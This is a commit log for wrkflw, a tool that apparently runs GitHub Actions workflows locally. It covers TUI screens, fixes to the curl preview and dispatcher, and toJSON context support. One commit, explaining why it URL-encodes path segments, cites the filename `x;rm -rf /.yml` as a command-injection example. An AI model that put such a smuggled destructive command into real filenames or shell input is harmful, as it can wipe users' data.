102 Commits

Author SHA1 Message Date
bahdotsh
5ac563d213 Release 0.8.0
wrkflw@0.8.0
wrkflw-evaluator@0.8.0
wrkflw-executor@0.8.0
wrkflw-github@0.8.0
wrkflw-gitlab@0.8.0
wrkflw-logging@0.8.0
wrkflw-matrix@0.8.0
wrkflw-models@0.8.0
wrkflw-parser@0.8.0
wrkflw-runtime@0.8.0
wrkflw-secrets@0.8.0
wrkflw-trigger-filter@0.8.0
wrkflw-ui@0.8.0
wrkflw-utils@0.8.0
wrkflw-validators@0.8.0
wrkflw-watcher@0.8.0

Generated by cargo-workspaces
2026-04-22 00:22:41 +05:30
Gokul
4a3c5b2e73 docs: catch up on everything that landed after v0.7.3 (#107)
v0.7.3 was tagged back in August and then roughly fifty commits
happened. The docs, predictably, noticed none of this.

The README still advertised four TUI tabs when the TUI now has
seven, still listed three runtime modes when there are four, still
declared artifacts/cache/reusable-workflow outputs as "Not
Supported" when all three shipped in #88 and #94, and never
mentioned `wrkflw watch` or the `--event` / `--diff` /
`--changed-files` flags at all. `wrkflw-trigger-filter` and
`wrkflw-watcher` existed in the workspace without READMEs. Two of
the Rust examples referenced a `runtime` field on
`ExecutionConfig` that is actually called `runtime_type`, and
printed a `summary_status` field that doesn't exist. One
`run_wrkflw_tui` example was missing an argument. That kind of
thing.

While at it, BREAKING_CHANGES.md was labeling three entries as
"(v0.7.3)" when the underlying commits all landed *after* the
v0.7.3 tag — so calling them part of that release was, let's say,
a work of fiction. Relabel as "(Unreleased)" with a note up top
pointing at the next release.

New trigger-filter and watcher READMEs are deliberately short —
most users should hit that code through the CLI flags, not by
depending on the crates directly. No point padding them.

Nothing here is a code change. Just the docs finally telling the
truth about what's in the tree.
2026-04-21 23:43:11 +05:30
Gokul
ebe8083f33 feat(ui): ship screens 4, 7, 8 and the Tweaks overlay (#105)
* feat(ui): ship screens 4, 7, 8 and the Tweaks overlay

PR #104 landed three screens from the Claude Design handoff
(Dashboard, Live Run, Step Inspector) and deliberately punted the
rest because "a UI without backing data is worse than no UI." Fair.
Picked up the remaining screens that actually *have* backing data
today, and left the one that doesn't alone.

Three new top-level tabs:

  - DAG (tab 3) — full topological view of the selected workflow,
    `g` toggles between the spatial column layout and a stage-list
    layout. Reuses the existing `dag::topo_levels` so what you see
    here is exactly what the mini-DAG in the Execution tab shows,
    just bigger.
  - Trigger (tab 5) — form + live curl preview, dispatches through
    `wrkflw_github::trigger_workflow` or
    `wrkflw_gitlab::trigger_pipeline`. `p` flips platform, `+` adds
    a k=v input, `Tab` walks fields, `Enter` dispatches, `c` dumps
    the curl into the log buffer because integrating with every
    terminal's clipboard is not a fight I want to pick today.
  - Secrets (tab 6) — reads SecretConfig::default(), shows the
    providers the user actually has wired, detail pane with `m` to
    toggle the value mask. Runtime pills on the side share state
    with the existing runtime cycler. We do *not* render a list of
    individual secret keys; SecretManager doesn't expose a
    list_known_keys() and I refuse to fake one.

Step Inspector's Matrix sub-tab now calls
wrkflw_matrix::expand_matrix and renders up to 32 combos with an
overflow badge. Status glyph inherits from the parent job because
per-combo status isn't tracked end-to-end yet — a future executor
change to surface it will drop straight into this render.

Tweaks overlay (`,` key) ports the design's floating TweaksPanel.
Only one knob: accent color, five slots matching the design
palette. theme::set_accent_override plumbs the chosen color into
a thread-local the brand mark and focused borders consult every
frame. Dropped theme (dark/light) and density from the panel
because they'd be dead toggles today — the rule is the rule.

What's still not in: screen 6 (Run history + diff). That one
needs a storage layer we don't have — no run persistence, no
serialized run records, no diff engine. Building a UI on top of
nothing would be exactly the thing PR #104 warned against. Left
for a separate PR that starts from storage.

Verified: cargo build --workspace, cargo clippy --workspace
--all-targets -- -D warnings, cargo test --workspace (734 tests,
all green), cargo test -p wrkflw-ui (25/25). Clean.

* docs(examples): add ui-demo workflow set for the new screens

The new UI (screens 4, 7, 8 + Tweaks) shipped without a dedicated
set of workflows to poke at it. The existing tests/workflows/
fixtures are fine for the parser, but they don't have the shapes
you actually want to eyeball — there's no clean diamond, no wide
multi-stage fan-out, no workflow_dispatch with a mix of input
types.

So you end up firing up the TUI and squinting at whatever happens
to be checked in. Not great.

Add examples/ui-demo/ with one workflow per screen/feature: a
diamond and a wide fan-out DAG for screen 4, a workflow_dispatch
with choice / string / bool inputs for screen 8, a matrix with
include/exclude plus three scopes of env for the Step Inspector,
a secrets + services + container job for screen 7, a multi-event
trigger for the `d` diff filter, and a mixed-status workflow so
the status badges aren't stuck on all-green.

Every file carries a header comment explaining which screen it
targets and what to look at. All eight parse clean under
`wrkflw validate`.

* fix(ui): clean up loose ends around the new tabs and Tweaks overlay

The DAG / Trigger / Secrets tabs and the Tweaks overlay shipped
with the edges unfinished. A review turned up a pile of
correctness and consistency bugs that individually didn't look
like much but together amounted to "the tabs work but everything
around them lies."

The status bar's context_hints still only knew about the old
4-tab layout — tab 2 was now DAG but showed Logs hints, tab 3
was Logs but showed Help hints, tabs 4-6 went blank. The Help
overlay still said "1-4 / w,x,l,h" and listed four tabs. Every
keyboard-help surface was advertising the wrong layout.

The Tweaks overlay's doc comment claimed it was modal — "the
overlay wins" — but the match arm only handled Esc / \`,\` /
\`a\`/\`A\`. Everything else (q, d, 1-7, ?) fell through to the
global handler. The comment was aspirational. The code was not.

trigger_dispatch had no in-flight guard. Hit Enter twice
quickly, fire two workflow_dispatch requests. Against real
repos. This is the kind of "oops we double-ran the deploy" bug
that nobody enjoys.

render_target_pane called resolve_target on every frame, which
shelled out to \`git remote get-url origin\` + \`git symbolic-ref\`
+/- \`git rev-parse\` *on every frame*. The event loop polls at
50ms, so sitting on the Trigger tab produced ~40-60 git
subprocesses per second. Per second.

And the DAG tab cheerfully printed fabricated column labels —
["setup", "lint", "build", "test/docs", …] — positionally
assigned to topological levels, with no relationship to actual
workflow content. A release pipeline's third layer would read
"build" even when it was \`deploy\`. Exactly the "UI without
backing data" footgun the previous PR was supposed to avoid.

The fix is mechanical:

  - Rewrite status_bar hints and the Help overlay for 7 tabs.
  - Make the Tweaks overlay actually modal — unmatched keys
    \`continue\` instead of falling through.
  - Add a trigger_in_flight AtomicBool; set before spawn,
    cleared by the spawned task regardless of outcome.
  - Cache the resolved target on App; invalidate on platform
    toggle. No more subprocess storm.
  - Replace the hand-rolled JSON escaper with serde_json, which
    has been in the tree the whole time. While at it,
    shell-escape the GitHub ref and double-quote-escape the
    GitLab k/v pairs so the curl preview is copy-paste safe.
  - Drop the fabricated stage labels; print "stage N" because
    that's the honest thing.
  - Sort the include-only matrix column tail so HashMap order
    can't cause visual jitter between frames.
  - switch_tab re-masks secrets when leaving the Secrets tab.
    The doc had claimed this all along; now it's actually true.
  - Empty env vars no longer count as a set auth token.
  - trigger_input_cursor is Option<usize>, not a usize::MAX
    sentinel. Please don't use usize::MAX for "not set" when
    Option exists.

Sixteen new unit tests cover the new helpers and edge cases.
Full workspace build + clippy -D warnings + test suite clean.

* fix(ui): stop the Trigger tab from smearing the TUI on dispatch

The Trigger tab shipped in the previous commit calls into
wrkflw_github::trigger_workflow and wrkflw_gitlab::trigger_pipeline
from a tokio::spawn. Both of those are happily scattering println!
and eprintln! calls — "Repository: x/y", "Using branch: main",
"Workflow triggered successfully!", you name it — straight to the
stdout that ratatui is rendering into.

The TUI owns the terminal. The SDK crates write to it anyway. The
result is a frame full of garbled half-redrawn panels the moment the
user hits Enter. wrkflw_logging::set_quiet_mode(true) is already
being armed at TUI start, but it only gates the logging subsystem —
raw println! skips right past it.

Route every one of those prints through wrkflw_logging::{info,warning}
so the quiet-mode flag actually does the thing it says on the tin.
Adds wrkflw-logging as a dep to both crates, which is fine — it's
where those messages belonged in the first place.

While at it, fix the rest of what was broken around the Trigger tab:

The GitLab curl preview was cheerfully lying. It pointed users at
/trigger/pipeline with a PRIVATE-TOKEN header, which is a
combination that has never worked — /trigger/pipeline wants a
trigger token, and the real dispatcher calls /pipeline with a JSON
body. Copy-paste the preview and you'd get a 401, maybe a 404.

Rebuilt both previews off the same request shape the dispatcher
actually sends. GitHub and GitLab bodies are now built via
serde_json end-to-end (github_dispatches_body, gitlab_pipeline_body),
shell-escaped with a single helper, and the URL uses the resolved
repo from the target cache instead of <owner>/<repo> / <id>
placeholders.

The dispatch outcome used to reach the user only via the Logs tab —
the one on Trigger heard nothing back. Added a mpsc channel so the
spawned task reports success/failure back to the main event loop,
which mirrors it onto the status bar. Drain runs once per tick next
to the existing execution-result drain.

The DAG graph view was splitting the area into equal-ratio columns
with no floor, so on anything narrower than 18 * stages cells the
box-drawing characters wrapped and the whole graph looked like
someone spilled coffee on it. Clamped columns to a fixed 18-cell
width, render "+N more stages" in the overflow slot, and nudge
users toward g for list view. Dropped the duplicated "L1 stage 1"
header while I was in there.

AccentScope wraps the thread-local accent override in an RAII guard
so it lives for exactly one frame. A thread-local that nobody ever
clears is a booby trap for whoever adds the second theme knob.

The old trigger-dispatch test spawned a real tokio task that called
the real wrkflw_github::trigger_workflow. If GITHUB_TOKEN happened
to be set in the environment — hello, CI — it would fire a real
workflow_dispatch against whatever repo git remote resolved to. That
is not a test. Replaced with a synchronous guard test that pre-arms
the in-flight flag and asserts rejection. No spawn, no runtime, no
network. New tests cover the preview bodies, split_slug, and the
outcome-drain mapping.

* fix(ui): sand off the UX edges flagged in the screens-4-8 review

A review pass over the new DAG / Trigger / Secrets / Tweaks tabs
turned up a small but consistent failure mode: several bits of the
UI were quietly lying to the user, and a couple of input paths
were eating keystrokes that mattered.

The Secrets tab's header badge advertised "providers configured",
but the tab reads `SecretConfig::default()` unconditionally — no
real config file is loaded yet. A user who had carefully
customised their secrets config would see the two hard-coded
defaults and a badge telling them everything was wired up. That's
exactly the "UI without backing data" footgun PR #104 set out to
ban. Rename the badge to "default providers" and update the file
header so the caveat doesn't get lost the next time someone skims
the module.

The Trigger tab's edit-mode key handler returned `false` for Up /
Down / Left / Right, which meant directional keys fell through to
the global handler and called `trigger_tab_prev/next_workflow`.
So a user typing `env=prod` who hit ↓ to correct the row above
had the *workflow about to be dispatched* silently changed
underneath them. Consume the arrows in edit mode — no-op for now;
a future enhancement can route them to prev/next field if we want
that.

`resolve_trigger_target`'s error branch admitted the repo was
`<unresolved>` while cheerfully inventing `default_branch: "main"`.
Two fields, two voices, one warn badge the user might or might
not notice. Mark the branch `<unresolved>` too so the
un-resolution story is consistent. The dispatcher has its own
`get_repo_info` call in the hot path, so this is strictly a
display-honesty fix.

The Tweaks overlay was modal to the point of swallowing `q`. Quit
is universally modal-safe in this TUI; silently eating it is a
discoverability trap. Let it through.

While at it, `field_row_hl` was taking `hint: String` where the
sibling `field_row` took `&str`. Match the sibling. Tiny thing,
but the kind of inconsistency that compounds.

Two regression tests pinned to the arrow-swallow path and the
resolve-error shape, so a future refactor can't quietly re-open
either footgun.

* fix(ui): clear out the self-review pile for screens 4-8

A review of the new DAG / Trigger / Secrets tabs and the Tweaks
overlay turned up a depressingly long list of "works in the happy
path, lies to the user otherwise" bugs. Dealing with them in one
sweep rather than trickling out a dozen one-liner fixes.

The headliner: the Trigger tab renders a "Branch / ref" row as if
it's editable, but *no keystroke* ever wrote into `trigger_branch`.
The dispatcher and the curl preview both honoured the field — the
field just had no input path. A user wanting anything other than
the git-resolved default was out of luck.

Add a `b` shortcut to focus the branch row, extend
`trigger_handle_input_key` to route into `self.trigger_branch`
when focused, and rework `trigger_tab_next_field` so Tab cycles
Branch → Input(0).key → Input(0).value → … → wrap. Three tests
pin the edit path, the Esc-clears-override path, and the mutual
exclusion between branch edit and input edit.

`state_for_job` in the DAG tab was using `std::ptr::eq` against
`app.workflows` elements to figure out which workflow was the
current execution, with `usize::MAX` as the fallback. It worked
today because the render path gets its `&Workflow` from the same
Vec, but it was one refactor away from returning `Some(usize::MAX)`
and silently matching against `app.current_execution`. Thread the
index the caller already has and compare that. No more pointer
identity.

The Secrets tab's "reveal / mask" toggle was theatre. There are no
actual secret values at this layer — the "value" being masked was
the *provider's source descriptor*, i.e. a filesystem path or an
env-var prefix. Bullet-masking a filename protects nothing and
teaches the user that "masking" means something it doesn't. Rip
out `secrets_reveal`, the `m` handler, and the `switch_tab`
auto-revert. When per-secret values land the toggle can come back
attached to something it can legitimately hide.

The Trigger tab's curl preview was building a `format!` string
with Rust's backslash-newline line continuation (which *strips*
the backslash) and then splitting the result on `" \\"`. That
split never matched anything, so the preview rendered as one long
line relying on terminal wrap. Rebuild with explicit ` \\\n` joins
and split on `\n` at render time.

`format_yaml_scalar`'s fallback runs non-scalar matrix values
through `serde_yaml::to_string`, which for sequences and maps
returns multi-line YAML. That got shoved into a single ratatui
Span. Collapse embedded newlines to a visible ` · ` separator.

`drain_trigger_outcomes` overwrote `status_message` on every
iteration — if two outcomes arrived in the same tick (rare, but
the in-flight guard could relax later) the first was silently
lost. Log each drained outcome to `self.logs` as the durable
record, and have the status bar prefer errors over later
successes in the same drain.

Tab indices: stop pretending `2, 3, 4, 5, 6` are self-documenting.
Introduce `TAB_WORKFLOWS` / `TAB_EXECUTION` / … constants next to
`TAB_LABELS` and use them everywhere. `switch_tab` used to define
a local `SECRETS_TAB = 5` that the rest of the file promptly
ignored. Please don't do that.

While at it, widen the accent override plumb-through. The Tweaks
panel claimed to recolour the UI but only `block_focused` and the
title_bar brand were actually consulting `current_accent()` — the
other 14 `COLORS.accent` call sites stayed on the static palette.
A user flipping accent saw the focused borders change and nothing
else, which looks broken. Point all accent readers at the
thread-local override.

Minor: hoist \`provider_entries()\` to one call per frame (was 3×),
dedupe the \`truncate(name, 12)\` call in the DAG graph (was
computed twice per node).

cargo fmt + clippy -D warnings clean; 48/48 UI tests green.

* fix(ui): close the screens-4-8 review debt

A review pass over the screens-4-8 branch turned up three things
that the earlier "done" sweep in 09da60a should have caught. Dealt
with them in one commit rather than three.

The accent plumb-through was overstated. 09da60a claimed all accent
readers went through the thread-local override, but
`BadgeKind::Accent` still resolved to `COLORS.accent`,
`brand_style`/`label_style` were dead but still reaching for the
static palette, and `progress_bar`'s default was hardcoded cyan. A
user flipping to Amber saw focused borders change and the "d Toggle
diff filter" chip stay exactly the same — the same "feature lies
about what it does" failure mode the review was trying to plug.
Route the badge variant through `current_accent()`, delete the two
dead helpers, and switch the progress bar default over.

The curl preview was shell-escaping the JSON body but interpolating
owner/repo/workflow-name raw into the URL path. Those three come
from `git remote` + the local filesystem — nothing stops a workflow
filename like `x;rm -rf /.yml` from producing a copy-paste line that
does exactly what it says on the tin. Pipe every path segment
through `urlencoding::encode`. Not a high-probability hazard, but
the preview is *explicitly* there to be copy-pasted, so unquoted
user input is an unforced error.

Same 09da60a commit introduced TAB_WORKFLOWS..TAB_HELP as canonical
indices and swept the codebase — except for
`status_bar::context_hints`, which was still matching bare 0..6.
Port it. Please don't use a bare integer for a tab index when the
constant is right there.

While at it: `trigger_tab_copy_curl` was pushing a multi-line curl
string as one log entry (embedded newlines, rendered garbled);
successful dispatches now set a Success (green) status message
instead of Info (cyan) so they're visually distinct from the
"queued" messages that share the Trigger tab's accent; renamed a
shadowed `truncated` local in `dag_tab` that was doing double duty
as both the overflow-stage count and the char-truncated job name.
Four new tests pin the curl fallback placeholders, the URL-encoding
regression, input-row Enter fallthrough, and AccentScope dropping
the thread-local on scope exit.

cargo fmt + clippy -D warnings + full workspace test suite clean.

* fix(ui): close the remaining review debt on screens 4-8

A review pass over the screens-4-8 branch turned up three things
that survived the last round. Dealing with them in one commit.

It turns out the curl preview and the real dispatcher were
computing the workflow URL segment *differently*. The preview
stripped `.yml`/`.yaml` and url-encoded the full user input —
subdir and all. The dispatcher ran `Path::new(name).file_stem()`
(which drops the subdir) and then unconditionally re-appended
`.yml`, turning a `ci.yaml` workflow into a `ci.yaml.yml` URL
that has never worked.

So the preview was lying about what Enter would send, the
dispatcher had a latent `.yml.yml` bug for any input that already
carried the extension, and `.yaml` files silently became `.yml`
URLs on dispatch.

Consolidate both paths behind a single
`wrkflw_github::workflow_dispatch_path_segment` helper. Drops any
subdir prefix, preserves an existing `.yml`/`.yaml`, appends
`.yml` only when absent. The preview and the dispatcher now
produce byte-identical URL segments for the same input — and the
`.yaml.yml` footgun is gone as a side effect.

The second one: `a` (select-all) and `r` (queue+run) were gated
only on `!app.running`, not on the active tab. Pressing `a` on
the DAG or Trigger or Secrets tabs — outside edit mode — would
silently flip every workflow to `selected` behind the user's
back. Same story for `r` queuing an execution. Add the tab gate.
Please don't do that.

The third one: `trigger_in_flight` was cleared by a trailing
`store(false)` at the end of the spawned dispatch task. Fine on
normal return. A panic inside reqwest or either SDK would skip
right past it, strand the flag at `true`, and lock the Trigger
tab into a permanent "already in flight" state until the TUI
restarts. Wrap the flag in an `InFlightGuard` RAII so Drop is
what actually clears it. Normal return, early return, *and*
unwinding all land it back at `false`.

While at it: dropped the `DEBUG: Shift+R pressed` log spam that
was sprinkled through the reset handlers, deleted the now-dead
`strip_yaml_suffix` helper, and cleaned up a stray
`test_edge_cases.rs` debug script that had been sitting in the
repo root.

Eight new tests across the two crates cover the shared URL
helper, the preview/dispatcher identity, \`.yaml\` round-trip, and
the in-flight guard on both normal drop and \`catch_unwind\` panic
paths.

cargo fmt + clippy -D warnings + full workspace test suite clean.
2026-04-21 22:47:50 +05:30
Gokul
1824e73ebd feat(ui): rebuild TUI to match the new design system (#104)
* feat(ui): rebuild TUI to match the new design system

Phase 1 of the redesign that landed in the Claude Design handoff
bundle: Workflows becomes a Dashboard, Execution becomes a 3-pane
Live Run, Job detail becomes a tabbed Step Inspector. The visual
DNA — palette, status bar, title bar, status badges — now matches
the design instead of inheriting whatever your terminal feels like.

The old palette used ratatui named colors (Color::Cyan, Color::
Yellow, ...), which means every terminal got a slightly different
TUI. Swap to exact RGB straight from the design (#5fd3f3 cyan,
#f5d76e yellow, #8fce8f green, #d68cff trigger purple, ...). Same
TUI everywhere, at the cost of not respecting per-terminal themes.
Fair trade.

Layouts:

- Title bar: flat 1-row with brand mark, numbered tabs, and a
  right-side pulsing LIVE indicator + runtime badge.
- Status bar: left-aligned [key] chips, right-aligned validation
  / runtime / availability / workflow count. Key hints stop being
  one fat string concatenation.
- Workflows: 60/40 split. Table on the left grows columns for
  trigger-match dot and job count. Right column stacks Preview
  (parsed name / on / jobs / chain / counts), Trigger filter
  (live match/skip counts), Quick actions (six labelled key
  tiles).
- Execution: 3 panes — Jobs (synthesised from job_names so
  pending jobs show too, not just executed ones) · Steps + Live
  output · Mini DAG (topo-laid from Job.needs) + Timing chart.
- Job detail: tabbed Step Inspector — Output / Env / Files /
  Matrix / Timeline. Tab cycles them when in detailed view.
  Env and Files are honest placeholders because per-step env
  snapshots and workspace-diff capture don't exist yet in the
  executor. Faking them looked tempting; I didn't.

Workflow now carries an Arc<WorkflowDefinition> populated at
load time, so Preview and the mini DAG read real data instead of
re-parsing on every frame. App gains a step_inspector_tab: usize
plus a Tab handler when detailed_view is true.

What's *not* in this PR: screens 4-8 from the design (DAG full
view, Matrix expansion, Run history+diff, Secrets manager,
Remote trigger UI) and the Tweaks panel. Those need new feature
plumbing in the executor / runtime / storage, not just render
work, and a UI without backing data is worse than no UI.

Verified: cargo build --workspace, cargo clippy --workspace
--all-targets -- -D warnings, cargo test --workspace, cargo
test -p wrkflw-ui (25/25). All clean.

* style(ui): cargo fmt
2026-04-21 12:28:59 +05:30
Gokul
7b2a27a532 refactor(executor): separate user env from runner env in ExpressionContext (#102)
* refactor(evaluator): add user_env field to ExpressionContext

Prior commits landed bare-context support for toJSON(steps),
toJSON(needs), toJSON(github), toJSON(secrets), and toJSON(matrix).
toJSON(env) is next — and it's the ugly one. The existing
implementation filters env_context through an is_user_env_var()
heuristic: "if the key doesn't start with GITHUB_/RUNNER_/INPUT_/
WRKFLW_ and isn't CI or MATRIX_CONTEXT, it must be user-declared."

It turns out that's wrong in both directions. A user who writes
`env: { GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} }` in their YAML —
which is the single most common pattern on planet Earth — gets their
token silently dropped from toJSON(env). Meanwhile any new runner
var that isn't on the exclusion list leaks in. Key-level guessing
can't separate the two populations after they've been merged into
one flat map. The fix has to happen at the seam.

So: add `user_env: &'a HashMap<String, String>` to ExpressionContext
alongside env_context. env_context stays as-is (it's the union, used
for dotted `env.FOO` and `github.FOO` lookups); user_env carries
only what the user declared, and that's what toJSON(env) reads.

This commit is the mechanical half. The field is wired through every
construction site, but at each production site in engine.rs we build
user_env inline by running the old heuristic against env_context —
exactly the behavior we had before, just relocated. Not pretty, but
it keeps the tree green and all 399 tests passing while the plumbing
lands. Commit 2 replaces these inline filters with a user_env that's
tracked properly through the workflow/job/step env merges and the
$GITHUB_ENV writes, and deletes is_user_env_var for good.

The test helpers (empty_ctx, make_ctx, etc.) dual-populate env_context
and user_env from the single env argument, so most tests didn't
need touching. Three toJSON(env) tests did — they were stuffing
runner vars into the same map as user vars and asserting the
heuristic filtered them, which is a thing that can't be expressed
anymore. Those now construct ExpressionContext directly with
distinct populations. While at it, the test that was literally
called tojson_env_excludes_user_var_with_internal_prefix — which
asserted the bug as if it were a feature — is inverted and renamed.
Please don't write tests that ratify bugs.

StepExecutionContext::expr_context() and expr_context_with_env()
grew a user_env_buf: &mut HashMap parameter because the returned
ExpressionContext has to borrow from somewhere, and self is
already borrowing job_env. Callers pass a local buffer. Ugly but
localized — and this too goes away in Commit 2 when the struct
carries its own user_env field.

* refactor(executor): track user_env through layered env merges

Commit 1 added the user_env field to ExpressionContext but populated
it at each construction site by re-running the same is_user_env_var()
heuristic against env_context. That was honest plumbing — it said
"here's where the field goes" without actually changing any behavior.
Now we replace the heuristic with the thing it was always pretending
to be.

The real shape is: env_context is still the union used for dotted
lookups (env.FOO, github.X). Alongside it we now carry user_env as a
parallel HashMap that is strictly what the user declared — nothing
more, nothing less. Thread it through JobExecutionContext,
MatrixExecutionContext, and StepExecutionContext, populated at the
four places where user env actually enters the system:

  1. Workflow-level: seeded empty, workflow.env resolved values
     get mirrored in (with the same or_insert precedence as
     env_context, so workflow.env doesn't shadow runner vars).
  2. Job-level: clone workflow user_env, layer container.env and
     job.env on top. Runner-internal GITHUB_JOB (via
     add_job_context) stays in env_context only.
  3. Matrix jobs: same as job-level but skip the MATRIX_*
     vars — they're runner-internal, they belong to the matrix
     context, not to env.
  4. Step-level: clone job user_env, layer step.env on top after
     expression resolution.

And the one that mattered most: GITHUB_ENV writes from steps.
apply_step_environment_updates now mirrors env-file writes into
user_env too, because a step running 'echo FOO=bar >> GITHUB_ENV'
is user-declaring FOO by definition — otherwise a step that writes
its own FOO wouldn't see it in the next step's toJSON(env).
GITHUB_PATH updates stay out of user_env because PATH is not a
user-declared env var. There's a test for this.

With real tracking in place, is_user_env_var() is gone, along with
its environment.rs test that did nothing but rubber-stamp the
heuristic's list of prefixes. StepExecutionContext::expr_context()
and expr_context_with_env() lose the ugly user_env_buf: &mut
HashMap parameter that Commit 1 used as a bridge — they read
self.job_user_env directly now.

Two non-obvious scope decisions, both flagged in the code:

  - Reusable workflows (run_called_workflow) get an empty
    user_env on entry. Parent workflow.env doesn't leak across
    reusable-workflow boundaries, and the called workflow's own
    workflow.env isn't merged into child_env at all (that's a
    pre-existing gap, not mine to fix here). Job-level env merges
    still populate user_env correctly downstream.
  - GitLab pipelines don't carry a workflow-level env:, so the
    gitlab-path callsite also starts with empty user_env.

398 tests pass, clippy clean, fmt clean. The PR that ships this
fixes the original bug: a user who writes their GITHUB_TOKEN via
workflow/job/step env: will now actually see it in toJSON(env).
Which, let's be honest, they should have been able to see all along.
2026-04-18 23:21:40 +05:30
Gokul
74499d5279 feat(evaluator): make toJSON(matrix) return matrix object (#101)
It turns out that `toJSON(matrix)` has been returning "null" this
whole time — same disease as env, steps, needs, github, and
secrets before it. The evaluator had no bare-`matrix` branch in
ExpressionContext::resolve, so resolving the identifier fell
through to the catch-all `_ => Null` and toJSON dutifully
serialised that. Fifth and last in a series after #96/#97/#98/#99
/#100.

The fix is the obvious one. `matrix_combination` is already a
flat `&Option<HashMap<String, serde_yaml::Value>>` holding
exactly the shape real GHA exposes as the `matrix` context for a
single combination. Convert each value via the existing
`yaml_value_to_expr` helper — the same helper the dotted-access
arm already uses — so the bare and dotted forms agree on
per-value shape. Wrap the result in ExprValue::Object. Done.

One intentional asymmetry with the other bare-context arms:
when `matrix_combination` is `None` (non-matrix job), return
`Null` instead of an empty Object. `None` encodes "no matrix
context exists", which is what real GHA exposes for jobs without
a matrix strategy. `Some(empty)` — pathological but possible —
still renders as `{}`, preserving the Some-vs-None distinction
carried by the field's `Option<...>` type. There's a test
pinning each half of that split so any future change is
deliberate.

Tests mirror the #96–#100 suites: populated matrix, empty
combination, None → "null", mixed value types (string/number/
bool preserved natively, not stringified), sorted keys,
fromJSON(toJSON(matrix)) round-trip, bare-matrix truthiness in
both populated and None states, a regression guard that the
bare arm doesn't shadow the existing dotted-access arm, and a
YAML-sequence test that pins the current `yaml_value_to_expr`
fallback behaviour for non-scalar values.

While at it, drop the stale `TODO: support other bare contexts:
matrix` comment entirely. No bare contexts remain after this.
2026-04-18 22:38:11 +05:30
Gokul
e4752efa8e feat(evaluator): make toJSON(secrets) return secrets object (#100)
It turns out that toJSON(secrets) has been returning "null" this
whole time — same disease as env, steps, needs, and github before
it. The evaluator had no bare-`secrets` branch in
ExpressionContext::resolve, so resolving the identifier fell
through to the catch-all `_ => Null` and toJSON dutifully
serialised that. Fourth in a series after #96/#97/#98/#99.

The fix is the simplest of the bunch. secrets_context is already
a flat &HashMap<String, String> holding exactly the shape real
GHA exposes as the `secrets` context — no prefix strip, no
exclusion list (unlike #99's github arm), no nested outputs
sub-object (unlike steps/needs). Clone the entries into
ExprValue::String and wrap in ExprValue::Object. Done.

Values are returned in plaintext by design. That matches real
GHA — `toJSON(secrets)` there is not auto-redacted either, and
the common `fromJSON(toJSON(secrets))` pipe-through-an-action
pattern depends on the exact original values surviving the
round-trip. Masking stays where it belongs: the log boundary,
via wrkflw_secrets::SecretMasker, already wired up in engine.rs.

Pulling the masker into the evaluator would (a) break the
fromJSON round-trip, (b) diverge from GHA semantics, and (c)
duplicate a concern that already has one correct home. Please
don't do that.

Tests mirror the #96–#99 suites: populated secrets, empty
context, sorted keys, special-character values (quotes,
backslashes, PEM-style newlines), fromJSON(toJSON(secrets))
round-trip, bare-secrets truthiness, a regression guard that the
bare arm doesn't shadow the existing dotted-access arm, and a
plaintext-values test that pins the no-masking-here decision so
any future switch is deliberate rather than silent.

While at it, drop `secrets` from the lingering
`TODO: support other bare contexts` comment. Only `matrix`
remains.
2026-04-18 22:20:55 +05:30
Gokul
bb55e7f30f feat(evaluator): make toJSON(github) return github object (#99)
* feat(evaluator): make toJSON(github) return github object

It turns out that `toJSON(github)` has been returning `null` this
whole time — same disease as `env`, `steps`, and `needs` before it.
The evaluator had no bare-`github` branch, so resolving the
identifier fell through to the catch-all `_ => Null` and toJSON
dutifully serialized that.

The fix mirrors the bare-`env` arm added in #96. There's no
dedicated `github_context` field — `env_context` is already the
source of truth for `GITHUB_*` vars, since the dotted-access arm
(`github.sha` → `GITHUB_SHA`) reads from there. So the bare case is
just the inverse mapping: iterate env_context, filter keys starting
with `GITHUB_`, strip the prefix, lowercase, and wrap it as an
Object.

Still doesn't produce a nested `event` sub-object. That's the same
documented limitation as the dotted-access path — real GHA parses
`$GITHUB_EVENT_PATH` as a full JSON payload and we approximate it
via flat env vars. Not fixing that here; it's a bigger conversation.

Add tests for the populated case, empty env, no-GITHUB-prefix,
sorted keys, truthiness of bare `github`, a regression guard so
this arm doesn't shadow dotted access, special-character values,
and a fromJSON(toJSON(github)) round-trip.

Third in a series after #96 (env), #97 (steps), #98 (needs). Same
pattern. `secrets` and `matrix` still return null — those are
next.

* refactor(evaluator): tighten toJSON(github) after review

The toJSON(github) arm that landed in the previous commit had a few
rough edges worth fixing while it's still fresh.

The .strip_prefix("GITHUB_").unwrap_or(k) was dead-branch defensive
code — the preceding .filter(...) already guarantees the prefix, so
the fallback path couldn't actually execute. That's the worst kind
of defensive code: it obscures intent without doing any work.
Replace it with a direct slice. While at it, swap to_lowercase() for
to_ascii_lowercase() since env-var keys are ASCII.

Add k.len() > PREFIX.len() to the filter so a literal GITHUB_ key
doesn't strip-become-empty and emit a {"": "..."} entry. Not because
anyone is going to set that, but because silently emitting nonsense
is worse than not emitting it.

Expand the limitation comment: user-defined env vars with the
GITHUB_ prefix (notably the common env: { GITHUB_TOKEN: ... }) will
land in the output object, and GITHUB_TOKEN surfaces as github.token
in plaintext. No masking layer exists yet. Please don't dump
toJSON(github) into untrusted sinks.

Two new tests pin the token-leak behavior and the empty-suffix
filter so any future change is deliberate.

* fix(evaluator): exclude runner-internal keys from toJSON(github)

Another round of review on the bare-github arm turned up something
worth fixing before this lands.

It turns out that environment.rs unconditionally seeds GITHUB_OUTPUT,
GITHUB_ENV, GITHUB_PATH, and GITHUB_STEP_SUMMARY into env_context —
those are local tempfile paths for the runner's file-based
workflow-command protocol. In real GHA they're invisible to
expressions; they are not members of the `github` context. The
prefix-strip heuristic was happily leaking them out as `github.output`,
`github.env`, `github.path`, and `github.step_summary`, pointing at
paths inside our temp dir.

That's a semantic divergence from real GHA *and* a minor info leak
into any log that dumps toJSON(github). Not great.

Add a tiny INTERNAL_KEYS blocklist to the filter and drop them on
the floor. While at it, collapse the manual `k.len() > PREFIX.len()
&& k.starts_with(PREFIX)` + byte-slice dance into a single
strip_prefix + filter chain — same behavior, one prefix check
instead of two, and no byte-offset slicing that depends on PREFIX
being pure ASCII.

Two new tests: one pins the internal-keys exclusion, the other
locks in the documented GITHUB_FOO contamination case so any future
switch to a curated allowlist is a deliberate change, not a silent
behavior flip.

* fix(evaluator): close the last runner-internal hole in toJSON(github)

One more pass on the bare-github arm turned up another runner-only
